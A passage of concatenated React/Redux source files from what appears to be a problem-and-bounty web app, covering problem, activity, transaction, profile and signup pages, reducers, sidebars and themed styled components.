// the component below).
const mapStateToProps = (state, ownProps) => {
	const problemPageState = state.content.problemPage.page
	const problem = problemPageState.problem
	return {
		// written explicitly, so that submission entries is omitted
		problemActive: problem ? problem.active : null,
		// BUG FIX: also guard on `problem` — before the problem has loaded it
		// is null/undefined, and dereferencing `problem.submitted_by` for a
		// logged-in viewer threw a TypeError (the other keys already guard).
		problemOwner: problem && ownProps.user && problem.submitted_by && ownProps.user._id === problem.submitted_by._id,
		problemSolution: (problem && problem.accepted_submission) ? problem.accepted_submission._id : null,
		paging: problemPageState.paging,
		reply: problemPageState.reply,
		submissionFormSubmitted: problemPageState.submissionFormSubmitted,
		submissionEntries: problemPageState.submissionEntries,
		...ownProps
	}
}
// Problem-page thunks; the problem id is fixed from ownProps.
const mapDispatchToProps = (dispatch, ownProps) => ({
	loadProblemData: () => dispatch(problemPageActions.loadProblemData(ownProps.problemId)),
	loadSubmissionPage: page => dispatch(problemPageActions.loadSubmissionPage(ownProps.problemId, page)),
	reset: () => dispatch(problemPageActions.reset()),
})
// Full problem view: the problem body, an optional submission form, and an
// infinitely-scrolled list of submissions with replies.
class ProblemPage extends React.Component {
	componentWillUnmount() {
		this.props.reset()
	}
	componentDidMount() {
		this.props.loadProblemData()
	}
	render() {
		// problemActive === null means the problem has not loaded (or the load
		// failed); show the backend message instead of the problem layout.
		if (this.props.problemActive === null) {
			return (
				<PageDiv>
					<QueueSidebar />
					<BackendMessage messageType={this.props.messageType}>
						{this.props.message}
					</BackendMessage>
				</PageDiv>
			)
		}
		// Honestly looked for this bug for 8 hours, when this statement was moved to mapStateToProps, new object is constructed every time, which results in cyclic updating
		// Great infinite loop :D :D
		const submissionIdentifiers = this.props.submissionEntries.reduce((acc, cv, index) => acc.concat(Object.keys(cv).map(submissionId => ({id: submissionId, page: index}))), [])
		//const mergedEntries = this.props.submissionEntries.reduce((acc, cv) => Object.assign(acc,cv),{})
		// The submission form is offered only to logged-in non-owners while the
		// problem is active and they have not already submitted.
		const postSubmissionAvailable = this.props.problemActive && this.props.loggedIn && !this.props.problemOwner && !this.props.submissionFormSubmitted
		const mapSubmissionIdToComponent = (submissionEntry, index) => (
			<Submission
				submissionId={submissionEntry.id}
				page={submissionEntry.page}
				problem={this.props.problemId}
				key={index}
				acceptButton={this.props.problemActive && this.props.problemOwner}
				replyButton={this.props.loggedIn}
				loadRepliesButton={true}
				hasActiveReplyForm={this.props.loggedIn && submissionEntry.id === this.props.reply}
				paging={this.props.paging[submissionEntry.id]}
				token={this.props.token}
				isSolution={this.props.problemSolution === submissionEntry.id}
				wrapper={true}
			/>
		)
		const submissionCount = submissionIdentifiers.length
		const submissions = submissionIdentifiers.map(mapSubmissionIdToComponent)
		// Surface the accepted solution inside the problem header only when it
		// would otherwise be buried among multiple submissions.
		const embeddedSolution = (this.props.problemSolution && submissionCount > 1) ? (submissionIdentifiers.find(x => x.id === this.props.problemSolution) || null) : null
		return (
			<PageDiv>
				<QueueSidebar />
				<ContentDiv sidebar>
					<ProblemDiv>
						<Problem
							problemId={this.props.problemId}
							loggedIn={this.props.loggedIn}
							embeddedSolution={embeddedSolution}
						/>
						{postSubmissionAvailable && <PostSubmission token={this.props.token} problemId={this.props.problemId} />}
						<div>
							<InfiniteScroll
								pageStart={0}
								loadMore={() => this.props.loadSubmissionPage(this.props.paging.page + 1)}
								hasMore={this.props.paging.hasMore}
								loader={<div className="loader" key={0}>Loading ...</div>}
							>
								{submissions}
							</InfiniteScroll>
						</div>
					</ProblemDiv>
				</ContentDiv>
			</PageDiv>
		)
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(ProblemPage)
<file_sep>/src/styled-components/form/TextAreaDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
// Wrapper that sizes a textarea; the `center` flag switches to automatic
// horizontal margins. The tryhard variant strips the styling-only flag.
const BuzzfeedTextAreaDiv = styled.div`
	margin: 10px 5px 5px 5px;
	${({ center }) => center && 'margin: 10px auto;'}
	width: 80%;
	textarea {
		width: 100%;
		height: 100px;
	}
`
const TryhardTextAreaDiv = props => <div {...props} center={undefined}/>
const TextAreaDiv = props => (
	<ThemeSelector
		buzzfeed={<BuzzfeedTextAreaDiv {...props} />}
		tryhard={<TryhardTextAreaDiv {...props} />}
	/>
)
export default TextAreaDiv
import { transactionPageConstants } from '../../../constants/content/profile/transactionPage'
// Reducer for the paged transaction list. `entries` holds one array per
// fetched page; `paging` tracks the last loaded page and whether more exist.
const defaultState = {
	entries: [],
	paging: {
		page: 0,
		hasMore: true
	}
}
function transactionPageReducer(state=defaultState, action) {
	// Pages are 1-based; anything missing or below 1 clamps to page 1.
	const activePage = (!action.activePage || action.activePage <= 1) ? 1 : action.activePage
	switch (action.type) {
	case transactionPageConstants.LOAD_TRANSACTION_PAGE_REQUEST:
		// NOTE(review): hasMore is dropped while loading — presumably to keep
		// the infinite scroller from firing again mid-flight; confirm.
		return {
			message: 'Loading transactions...',
			loading: true,
			entries: state.entries,
			paging: {
				page: state.paging.page
			}
		}
	case transactionPageConstants.LOAD_TRANSACTION_PAGE_FAILED:
		return {
			message: action.message,
			paging: {
				...state.paging,
				hasMore: false
			},
			entries: state.entries
		}
	case transactionPageConstants.LOAD_TRANSACTION_PAGE_SUCCESS:
		// BUG FIX: clone the entries array before writing into it — the old
		// code mutated state.entries in place, which redux cannot detect.
		const newEntries = [...state.entries]
		newEntries[activePage - 1] = action.data || []
		return {
			entries: newEntries.slice(0,activePage),
			paging: {
				// If there was no data, dont update
				page: (action.data && action.data.length > 0) ? activePage : state.paging.page,
				hasMore: action.hasMore
			},
		}
	case transactionPageConstants.RESET:
		return defaultState
	default:
		return state
	}
}
export default transactionPageReducer
import React from 'react'
import { connect } from 'react-redux'
import InfiniteScroll from 'react-infinite-scroller';
import { activityPageActions } from '../../actions/content/profile/activityPage'
import { ProblemBox } from '../problem/ProblemBox'
import ProfileSidebar from './ProfileSidebar'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import ProblemBoxWrapper from '../../styled-components/problem-related/ProblemBoxWrapper'
// Expose the activity-page slice, flattening the per-page entry arrays
// into one list for rendering.
const mapStateToProps = state => {
	const pageState = state.content.profile.activityPage
	const flattened = pageState.entries.reduce((acc, cv) => acc.concat(cv), [])
	return { ...pageState, entries: flattened }
}
// Paging actions for a given user's activity feed.
const mapDispatchToProps = (dispatch, ownProps) => ({
	setUser: user => dispatch(activityPageActions.setUser(user)),
	loadPage: (user, page) => dispatch(activityPageActions.setActivePage(user, page)),
	reset: () => dispatch(activityPageActions.reset()),
})
// Paged list of problems a user has submitted (their activity feed),
// loaded incrementally via react-infinite-scroller.
class ActivityPage extends React.Component {
	componentDidMount() {
		this.props.setUser(this.props.user)
		this.props.loadPage(this.props.user, 1)
	}
	componentWillUnmount() {
		// Clear cached pages so a different user's feed starts fresh.
		this.props.reset()
	}
	render() {
		const base_url = '/u/' + this.props.user
		// Owners viewing their own profile get the private sidebar links.
		const auth_view = (this.props.user === this.props.viewer && this.props.loggedIn)
		const empty = this.props.entries.length === 0;
		if (empty) {
			return (
				<PageDiv>
					<ProfileSidebar baseUrl={base_url} auth_view={auth_view}/>
					<ContentDiv sidebar>
						<CenteredDiv fullWidth>
							<h3>{this.props.loading ? "Loading" : "User " + this.props.user + " has yet no activity"}</h3>
						</CenteredDiv>
					</ContentDiv>
				</PageDiv>
			)
		}
		return (
			<PageDiv>
				<ProfileSidebar baseUrl={base_url} auth_view={auth_view}/>
				<ContentDiv sidebar>
					<CenteredDiv fullWidth>
						<h3>{"Activity of user " + this.props.user}</h3>
					</CenteredDiv>
					<ProblemBoxWrapper>
						<InfiniteScroll
							pageStart={1}
							loadMore={() => {
								this.props.loadPage(this.props.user, this.props.paging.page + 1)
							}}
							hasMore={this.props.paging.hasMore}
							loader={<div className="loader" key={0}>Loading ...</div>}
						>
							<ul>
								{
								this.props.entries.map((p,index) => (
									<li key={index}>
										<ProblemBox
											id={p._id}
											title={p.title}
											active={p.active}
											created={p.created}
											bounty={p.bounty}
											loggedIn={this.props.loggedIn}
											viewCount={p.view_count}
											submissionCount={p.submission_count}
											username={p.submitted_by}
										/>
									</li>
								))}
							</ul>
						</InfiniteScroll>
					</ProblemBoxWrapper>
				</ContentDiv>
			</PageDiv>
		)
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(ActivityPage)
import { combineReducers } from 'redux'
import { reducer } from 'redux-form'
import { submitProblemPageConstants, submitProblemStages } from '../../constants/content/submitProblemPage'
const initialState = {
	stage: submitProblemStages.SUBMITTING_PROBLEM,
	queueOptions: []
}
// State machine for the submit-problem page: wizard stage, latest backend
// message, and the queues a problem can be submitted to.
// BUG FIX: the previous version carried the options forward as `state.queues`,
// a key that never exists (the loaded list is stored as `queueOptions`, see
// LOAD_QUEUES_SUCCESS and initialState), so the queue options were dropped on
// every subsequent action. All cases now read `state.queueOptions`.
const submitProblemPageReducer = (state = initialState, action) => {
	switch (action.type) {
	case submitProblemPageConstants.SUBMIT_REQUEST:
		return {stage: submitProblemStages.SUBMITTING_PROBLEM, message: "Waiting for server response", messageType: action.messageType, queueOptions: state.queueOptions}
	case submitProblemPageConstants.SUBMIT_SUCCESS:
		return {stage: submitProblemStages.COMPLETED, problemId: action.problem.id, message: "Problem submitted", messageType: action.messageType, queueOptions: state.queueOptions, queue: action.queue}
	case submitProblemPageConstants.SUBMIT_FAILED:
		return {stage: submitProblemStages.SUBMITTING_PROBLEM, message: action.error, messageType: action.messageType, queueOptions: state.queueOptions}
	case submitProblemPageConstants.LOAD_QUEUES_REQUEST:
		return {stage: state.stage, message: "Waiting for server response", messageType: action.messageType, queueOptions: state.queueOptions}
	case submitProblemPageConstants.LOAD_QUEUES_SUCCESS:
		return {stage: state.stage, queueOptions: action.queues}
	case submitProblemPageConstants.LOAD_QUEUES_FAILED:
		return {stage: submitProblemStages.SUBMITTING_PROBLEM, message: action.error, messageType: action.messageType, queueOptions: state.queueOptions}
	case submitProblemPageConstants.RESET:
		return initialState
	default:
		return state
	}
}
// The submit-problem form reuses redux-form's stock reducer.
const submitProblemFormReducer = reducer
// Combine the page state machine with the form state under one slice.
export default combineReducers({
	page: submitProblemPageReducer,
	form: submitProblemFormReducer
})
<file_sep>/src/constants/content/statistics/economyPage.jsx
// Redux action types for the economy statistics page (karma value loading).
// NOTE(review): unlike the sibling constant files these values carry no
// 'ECONOMY_PAGE_' prefix — harmless while no other slice reuses
// 'LOAD_KARMA_VALUES_*', but worth confirming before adding new reducers.
export const economyPageConstants = {
	LOAD_KARMA_VALUES_REQUEST: 'LOAD_KARMA_VALUES_REQUEST',
	LOAD_KARMA_VALUES_SUCCESS: 'LOAD_KARMA_VALUES_SUCCESS',
	LOAD_KARMA_VALUES_FAILED: 'LOAD_KARMA_VALUES_FAILED'
};
// Redux action types for confirming a new account registration.
export const confirmRegistrationConstants = {
	REQUEST: "CONFIRM_REGISTRATION_REQUEST",
	SUCCESS: "CONFIRM_REGISTRATION_SUCCESS",
	FAILED: "CONFIRM_REGISTRATION_FAILED"
}
import React from 'react'
import { connect } from 'react-redux'
import ProfileSidebar from './ProfileSidebar'
import ChangeEmailForm from './PersonalInformationPage/ChangeEmailForm'
import ChangePasswordForm from './PersonalInformationPage/ChangePasswordForm'
import ChangeUsernameForm from './PersonalInformationPage/ChangeUsernameForm'
import ChangeNamesForm from './PersonalInformationPage/ChangeNamesForm'
import ConfirmPasswordForm from './PersonalInformationPage/ConfirmPasswordForm'
import ProfileUpdateDispatcher from './PersonalInformationPage/ProfileUpdateDispatcher'
import { personalInformationPageActions } from '../../actions/content/profile/personalInformationPage'
import { personalInformationPageStages } from '../../constants/content/profile/personalInformationPage'
import PageDiv from '../../styled-components/defaults/PageDiv'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
// The page slice already has exactly the shape the component consumes.
const mapStateToProps = (state) => {
	const { page } = state.content.profile.personalInformationPage
	return page
}
// `reset` clears any in-progress form flow when the page unmounts.
const mapDispatchToProps = (dispatch) => ({
	reset: () => dispatch(personalInformationPageActions.reset()),
})
// Multi-form page for changing email, password, username, and names.
// `stage` drives a small wizard: submit a form -> confirm with the current
// password -> dispatch the actual profile update.
class PersonalInformationPage extends React.Component {
	componentWillUnmount() {
		this.props.reset()
	}
	render() {
		const message = this.props.message
		const messageType = this.props.messageType
		const form = this.props.form
		const token = this.props.token
		switch (this.props.stage) {
		case personalInformationPageStages.PASSWORD_CONFIRMATION:
			// A form was filled in; ask for the (current) password before applying.
			return (
				<ContentDiv>
					{'Please confirm by entering your ' + (form === 'password' ? 'current ' : '') + 'password'}
					<ConfirmPasswordForm form={form} token={token} />
				</ContentDiv>
			)
		case personalInformationPageStages.COMPLETED:
			// Password confirmed; ProfileUpdateDispatcher fires the update request.
			return (
				<ContentDiv>
					<ProfileUpdateDispatcher form={form} token={token} values={this.props.values} user={this.props.user}/>
					<BackendMessage messageType={messageType}>
						{message}
					</BackendMessage>
				</ContentDiv>
			)
		case personalInformationPageStages.SUBMITTING_FORM:
		default:
			// Default view: all four forms, each followed by its backend message
			// (shown only when that form is the one the message refers to).
			return (
				<PageDiv>
					<ProfileSidebar baseUrl={'/u/' + this.props.user} auth_view/>
					<ContentDiv sidebar>
						<CenteredDiv fullWidth>
							<BackendMessage messageType={messageType}>
								{!form && message}
							</BackendMessage>
							<ChangeEmailForm />
							<BackendMessage messageType={messageType}>
								{form === 'email' && message}
							</BackendMessage>
							<ChangePasswordForm />
							<BackendMessage messageType={messageType}>
								{form === 'password' && message}
							</BackendMessage>
							<ChangeUsernameForm />
							<BackendMessage messageType={messageType}>
								{form === 'username' && message}
							</BackendMessage>
							<ChangeNamesForm />
							<BackendMessage messageType={messageType}>
								{form === 'names' && message}
							</BackendMessage>
						</CenteredDiv>
					</ContentDiv>
				</PageDiv>
			)
		}
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(PersonalInformationPage)
<file_sep>/src/components/statistics/StatisticsSidebar.jsx
import React from "react";
import { Link } from "react-router-dom"
import SidebarDiv from '../../styled-components/sidebars/Sidebar'
import QueueSidebar from '../queue/QueueSidebar'
import QueueDropdown from '../queue/QueueDropdown'
import CollapsedSidebar from '../../styled-components/sidebars/CollapsedSidebar'
import CollapsedSidebarDiv from '../../styled-components/sidebars/CollapsedSidebarDiv'
const StatisticsSidebar = (props) => {
const routes = [
{
to: "/economy",
label: "System Economy"
},
{
to: "/scoreboard/Index",
label: "User Scoreboard"
}
]
const baseUrl = "/statistics"
const routeElements = (
<ul>
{
routes.map((entry, index) => (
<li key={index}><Link to={baseUrl + entry.to}>{entry.label}</Link></li>
))
}
</ul>
)
return (
<div>
<CollapsedSidebar>
<CollapsedSidebarDiv grow>
{routeElements}
</CollapsedSidebarDiv>
<CollapsedSidebarDiv shrink>
{props.addQueues && props.queueBaseUrl && <QueueDropdown baseUrl={props.queueBaseUrl} />}
</CollapsedSidebarDiv>
</CollapsedSidebar>
<SidebarDiv loggedIn={props.loggedIn}>
{routeElements}
{props.addQueues && props.queueBaseUrl && <QueueSidebar reuse baseUrl={props.queueBaseUrl}/>}
</SidebarDiv>
</div>
)
}
export default StatisticsSidebar<file_sep>/src/styled-components/header/ThemeDropdown.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedThemeDropdown = styled.div`
color: rgb(17,0,73);
border: 2px solid;
border-radius: 3px;
padding: 0.25em 1em;
margin: 2px 1em
:hover {
cursor: pointer;
text-decoration: underline;
}
`
const TryhardThemeDropdown = styled.div`
:hover {
cursor: pointer;
}
`
const ThemeDropdown = props => <ThemeSelector
buzzfeed={<BuzzfeedThemeDropdown {...props} />}
tryhard={<TryhardThemeDropdown {...props} />}
/>
export default ThemeDropdown<file_sep>/src/styled-components/form/ValidationMessage.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedValidationMessage = styled.div`
color: red;
`
const TryhardValidationMessage = props => <div {...props}/>
const ValidationMessage = props => <ThemeSelector
buzzfeed={<BuzzfeedValidationMessage {...props} />}
tryhard={<TryhardValidationMessage {...props} />}
/>
export default ValidationMessage<file_sep>/src/components/confirm/PasswordChange/PasswordChangeForm.jsx
import React from 'react';
import { Field, reduxForm } from 'redux-form'
import renderField from '../../form/RenderField'
import { confirmPasswordChangeActions } from '../../../actions/content/confirm/passwordChange'
import { signupActions } from '../../../actions/content/signup'
import Button from '../../../styled-components/defaults/Button'
// Dispatch the password-change confirmation with the token from props.
const submit = (values, dispatch, props) => {
	dispatch(confirmPasswordChangeActions.confirm(props.token, values.password))
}
// Synchronous validation: both fields are required and must agree.
// Note the check order: the mismatch message deliberately overrides the
// "required" message on confirmPassword when only one field is filled in.
const validate = (values) => {
	const { password, confirmPassword } = values
	const errors = {}
	if (!password) {
		errors.password = '<PASSWORD>'
	}
	if (!confirmPassword) {
		errors.confirmPassword = '<PASSWORD>'
	}
	if (confirmPassword !== password) {
		errors.confirmPassword = 'Passwords don\'t match'
	}
	return errors
}
const PasswordChangeForm = props => {
const { handleSubmit } = props;
return (<form onSubmit={handleSubmit}>
<Field name="password" component={renderField} type="password" label="Password (at least 8 characters)" alignLeft/>
<Field name="confirmPassword" component={renderField} type="password" label="Confirm password" alignLeft/>
<Button type="submit">Submit</Button>
</form>)
}
// Only blurring the password field triggers async (server-side) validation.
const asyncBlurFields = ['password']
export default reduxForm({
	form: 'form',
	validate,
	// Reuses the signup page's field validator (e.g. password checks).
	asyncValidate: (values, dispatch, props, blurredField) => signupActions.validateField(values, blurredField),
	asyncBlurFields,
	onSubmit: submit,
	// Form state lives under the password-change confirm slice, not the
	// default top-level `form` reducer.
	getFormState: ({content}) => content.confirm.passwordChange.form
})(PasswordChangeForm)
// Redux action types for toggling the profile premium subscription.
export const premiumPageConstants = {
	SUBSCRIBE: 'PROFILE_PREMIUM_SUBSCRIBE',
	UNSUBSCRIBE: 'PROFILE_PREMIUM_UNSUBSCRIBE'
}
import React from "react"
import { Redirect } from "react-router-dom";
import Auth from '../auth/Auth';
const ProfileAccess = ({viewer, user, resource, ...rest}) => {
if (viewer === user) {
return <Auth {...rest}/>
} else if (!!viewer) {
return <Redirect to={'/u/' + viewer + '/' + resource} />
} else {
return <Redirect to={'/u/' + user}/>
}
}
export default ProfileAccess<file_sep>/src/styled-components/profile/TransactionBoxWrapper.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBoxWrapper = styled.div`
margin-left: auto;
margin-right: auto;
width: 100%;
display: block;
li {
display: block;
left: -50px;
}
ul {
list-style-type: none;
padding: 0;
}
`
const TryhardTransactionBoxWrapper = props => <div {...props}/>
const TransactionBoxWrapper = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBoxWrapper {...props} />}
tryhard={<TryhardTransactionBoxWrapper {...props} />}
/>
export default TransactionBoxWrapper<file_sep>/src/components/signup/SignUpPage.jsx
import React from 'react';
import { connect } from 'react-redux'
import SignUpForm from './SignUpForm'
import { signupStages } from '../../constants/content/signUpPage'
import { signupActions } from '../../actions/content/signup'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
// The signup page slice already has the exact shape the component consumes.
const mapStateToProps = (state) => {
	const { page } = state.content.signup
	return page
}
const mapDispatchToProps = (dispatch) => ({
	reset: () => dispatch(signupActions.reset()),
})
// Registration page. Shows the signup form until the submission completes,
// then the backend's confirmation message plus its follow-up steps.
class SignUpPage extends React.Component {
	componentWillUnmount() {
		this.props.reset()
	}
	render() {
		switch(this.props.stage) {
		case signupStages.COMPLETED:
			// After a successful signup `message` is an object: a headline plus
			// an ordered list of next steps.
			return (
				<ContentDiv>
					<BackendMessage messageType={this.props.messageType}>
						{this.props.message.message}
					</BackendMessage>
					<ol>
						{this.props.message.steps.map((step, i) => (
							<li key={i}>{step}</li>
						))}
					</ol>
				</ContentDiv>
			)
		case signupStages.SUBMITTING_FORM:
		default:
			return (
				<ContentDiv>
					<BackendMessage messageType={this.props.messageType}>
						{this.props.message}
					</BackendMessage>
					<h1><NAME></h1>
					<SignUpForm />
				</ContentDiv>
			)
		}
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(SignUpPage)
<file_sep>/src/components/problem/BoostPage.jsx
import React from 'react';
import { connect } from 'react-redux';
import { Link } from "react-router-dom"
import BoostForm from './BoostPage/BoostForm'
import { boostActions } from '../../actions/content/boost'
import { boostStages } from '../../constants/content/boost'
import ContentDiv from '../../styled-components/defaults/ContentDiv'
import CenteredDiv from '../../styled-components/defaults/CenteredDiv'
import BackendMessage from '../../styled-components/defaults/BackendMessage'
// Combine routing props with the boost-page slice of the store.
const mapStateToProps = (state, ownProps) => {
	const { stage, message, messageType } = state.content.boost.page
	const { token, problemId } = ownProps
	return { token, problemId, stage, message, messageType }
}
const mapDispatchToProps = dispatch => ({
	reset: () => dispatch(boostActions.reset()),
})
// Page for boosting a problem's bounty. Shows the boost form until the
// operation completes, then a confirmation with a link back to the problem.
class BoostPage extends React.Component {
	componentWillUnmount() {
		this.props.reset()
	}
	render() {
		const message = this.props.message
		const messageType = this.props.messageType
		const problemId = this.props.problemId
		const token = this.props.token
		switch(this.props.stage) {
		case boostStages.COMPLETED:
			return(
				<ContentDiv>
					<BackendMessage messageType={messageType}>
						{message}
					</BackendMessage>
					<p>Would you like to go back to <Link to={'/problem/' + problemId}>the problem you just boosted</Link>?</p>
				</ContentDiv>
			)
		case boostStages.BOOSTING:
		default:
			return(
				<ContentDiv>
					<CenteredDiv>
						Boosting problem
					</CenteredDiv>
					<BoostForm problemId={problemId} token={token}/>
					<BackendMessage messageType={messageType}>
						{message}
					</BackendMessage>
				</ContentDiv>
			)
		}
	}
}
export default connect(mapStateToProps, mapDispatchToProps)(BoostPage)
<file_sep>/src/components/profile/ProfileSidebar.jsx
import React from "react";
import { Link } from "react-router-dom"
import SidebarDiv from '../../styled-components/sidebars/Sidebar'
import CollapsedSidebar from '../../styled-components/sidebars/CollapsedSidebar'
const ProfileSidebar = (props) => {
const privateRoutes = [
{
to: "/personal",
label: "Personal Information"
},
{
to: "/premium",
label: "Premium"
},
{
to: "/transactions",
label: "Transactions"
}
]
const publicRoutes = [
{
to: "/",
label: (props.auth_view) ? "My profile page" : "Profile page"
},
{
to: "/activity",
label: "User Activity"
}
]
const routes = (props.auth_view) ? publicRoutes.concat(privateRoutes) : publicRoutes
const routeElements = (
<ul>
{
routes.map((entry, index) => (
<li key={index}><Link to={props.baseUrl + entry.to}>{entry.label}</Link></li>
))
}
</ul>
)
return (
// render both versions, only one is displayed, depends on screen size
<div>
<CollapsedSidebar>
{routeElements}
</CollapsedSidebar>
<SidebarDiv>
{routeElements}
</SidebarDiv>
</div>
)
}
export default ProfileSidebar<file_sep>/src/constants/content/queuePage.jsx
export const queuePageConstants = {
SET_ACTIVE_PAGE_REQUEST: "QUEUE_PAGE_SET_ACTIVE_PAGE_REQUEST",
SET_ACTIVE_PAGE_SUCCESS: "QUEUE_PAGE_SET_ACTIVE_PAGE_SUCCESS",
NETWORK_ERROR: "QUEUE_PAGE_NETWORK_ERROR",
SET_ACTIVE_ENTRY: "QUEUE_PAGE_SET_ACTIVE_ENTRY",
RESET: "QUEUE_PAGE_RESET_PAGES"
}
<file_sep>/src/constants/content/problemPage.jsx
export const problemPageConstants = {
LOAD_PROBLEM_DATA_REQUEST: "PROBLEM_PAGE_LOAD_PROBLEM_DATA_REQUEST",
LOAD_PROBLEM_DATA_SUCCESS: "PROBLEM_PAGE_LOAD_PROBLEM_DATA_SUCCESS",
LOAD_PROBLEM_DATA_FAILED: "PROBLEM_PAGE_LOAD_PROBLEM_DATA_FAILED",
LOAD_SUBMISSION_PAGE_REQUEST: "PROBLEM_PAGE_LOAD_SUBMISSION_PAGE_REQUEST",
LOAD_SUBMISSION_PAGE_FAILED: "PROBLEM_PAGE_LOAD_SUBMISSION_PAGE_FAILED",
LOAD_SUBMISSION_PAGE_SUCCESS: "PROBLEM_PAGE_LOAD_SUBMISSION_PAGE_SUCCESS",
LOAD_REPLY_PAGE_REQUEST: "PROBLEM_PAGE_LOAD_REPLY_PAGE_REQUEST",
LOAD_REPLY_PAGE_FAILED: "PROBLEM_PAGE_LOAD_REPLY_PAGE_FAILED",
LOAD_REPLY_PAGE_SUCCESS: "PROBLEM_PAGE_LOAD_REPLY_PAGE_SUCCESS",
HIDE_REPLIES: "PROBLEM_PAGE_HIDE_REPLIES",
POST_SUBMISSION_REQUEST: "PROBLEM_PAGE_POST_SUBMISSION_REQUEST",
POST_SUBMISSION_FAILED: "PROBLEM_PAGE_POST_SUBMISSION_FAILED",
POST_SUBMISSION_SUCCESS: "PROBLEM_PAGE_POST_SUBMISSION_SUCCESS",
REPLY_SUBMISSION_REQUEST: "PROBLEM_PAGE_REPLY_SUBMISSION_REQUEST",
REPLY_SUBMISSION_FAILED: "PROBLEM_PAGE_REPLY_SUBMISSION_FAILED",
REPLY_SUBMISSION_SUCCESS: "PROBLEM_PAGE_REPLY_SUBMISSION_SUCCESS",
ACCEPT_SUBMISSION_REQUEST: "PROBLEM_PAGE_ACCEPT_SUBMISSION_REQUEST",
ACCEPT_SUBMISSION_FAILED: "PROBLEM_PAGE_ACCEPT_SUBMISSION_FAILED",
ACCEPT_SUBMISSION_SUCCESS: "PROBLEM_PAGE_ACCEPT_SUBMISSION_SUCCESS",
SELECT_REPLY_FORM: "PROBLEM_PAGE_SELECT_REPLY_FORM",
RESET: "PROBLEM_PAGE_RESET_PAGES"
}<file_sep>/src/components/queue/SubmitProblemPage/SubmitProblemForm.jsx
import React from 'react'
import { Field, reduxForm } from 'redux-form'
import MyEditor from '../../form/MyEditor'
import renderField from '../../form/RenderField'
import ReduxFormSelect from '../../form/ReduxFormSelect'
import CenteredDiv from '../../../styled-components/defaults/CenteredDiv'
import Button from '../../../styled-components/defaults/Button'
import { submitProblemActions } from '../../../actions/content/submitProblem'
const transformIntoOption = q => ({value: q, label: q})
const submit = (values, dispatch, props) => {
if (!values.queue) {
values.queue = transformIntoOption(props.defaultQueue)
}
dispatch(
submitProblemActions
.submit(
{
queue_name: values.queue.value,
title: values.title,
content: values.description
},
props.token
)
)
}
const validate = values => {
const errors = {}
if (!values.title) {
errors.title = 'Required'
}
if (!values.description) {
errors.title = 'Required'
}
return errors
}
const SubmitProblemForm = props => {
const { handleSubmit } = props;
const transformIntoOption = q => ({value: q, label: q})
let options = props.queueOptions || []
options = options.map(transformIntoOption)
return (
<form onSubmit={handleSubmit}>
<CenteredDiv>
<Field name="queue" component={ReduxFormSelect} options={options} defaultValue={transformIntoOption(props.defaultQueue)} label="Select queue"/>
<Field name="title" component={renderField} type="text" label="Title"/>
</CenteredDiv>
<Field name="description" component={MyEditor} />
<Button type="submit">Submit</Button>
</form>
)
}
export default reduxForm({
form: 'form',
onSubmit: submit,
validate,
getFormState: ({content}) => content.submitProblem.form
})(SubmitProblemForm)
<file_sep>/src/components/auth/LogoutPage.jsx
import React from 'react'
import { Redirect } from "react-router-dom";
import LogoutButton from './LogoutButton'
export default (props) => {
return !props.loggedIn ? (
<Redirect to={props.redirect} />
) : (
<div>
To access resource {props.redirect}, please
<LogoutButton loggedIn={props.loggedIn} logout={props.logout}/>
</div>
)
}<file_sep>/src/components/form/MyEditor.jsx
import React from "react"
//import SimpleMDE from "react-simplemde-editor"
//import "easymde/dist/easymde.min.css"
import MarkdownEditor from '../../styled-components/form/MarkdownEditor'
//konfiguracia: https://github.com/Ionaru/easy-markdown-editor#configuration
class MyEditor extends React.Component {
render() {
return (
<div>
{this.props.input && <MarkdownEditor options={{spellChecker: false}} onChange={this.props.input.onChange} style={{zIndex: '0'}}/>}
</div>
)
}
}
export default MyEditor
<file_sep>/src/styled-components/profile/TransactionBoxMeta.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
const BuzzfeedTransactionBoxMeta = styled.ul`
display: flex;
justify-content: space-between;
flex-basis: 30px;
font-size: 11px;
list-style-type: none;
padding: 0px;
`
const TryhardTransactionBoxMeta = props => <ul {...props}/>
const TransactionBoxMeta = props => <ThemeSelector
buzzfeed={<BuzzfeedTransactionBoxMeta {...props} />}
tryhard={<TryhardTransactionBoxMeta {...props} />}
/>
export default TransactionBoxMeta<file_sep>/src/styled-components/defaults/ContentDiv.jsx
import React from 'react'
import styled from 'styled-components';
import ThemeSelector from '../ThemeSelector'
import { sidebarStyleConstants } from '../sidebars/Constants';
const BuzzfeedContentDiv = styled.div`
grid-area: ${props => props.sidebar ? 'content' : 'page'};
${props => props.sidebar ? `
margin-left: 10rem;
` : `
margin-left: auto;
margin-right: auto;
`}
@media(max-width: ${sidebarStyleConstants.SIDEBAR_COLLAPSE}) {
margin-left: 0;
margin-right: 0;
margin-top: 0px;
@-moz-document url-prefix() {
margin-top: 50px;
}
}
margin-top: 20px;
padding: 10px;
font-family: Verdana, sans-serif;
textarea {
border-radius: 5px;
}
form {
border-radius: 10px;
padding: 7px;
background-color: rgba(67, 0, 50, 0.35);
margin: 10px;
}
`
const TryhardContentDiv = props => <div {...props} sidebar={undefined}/>
const ContentDiv = props => <ThemeSelector
buzzfeed={<BuzzfeedContentDiv {...props} />}
tryhard={<TryhardContentDiv {...props} />}
/>
export default ContentDiv<file_sep>/src/constants/content/profile/activityPage.jsx
export const activityPageConstants = {
SET_ACTIVE_PAGE_REQUEST: "ACTIVITY_PAGE_SET_ACTIVE_PAGE_REQUEST",
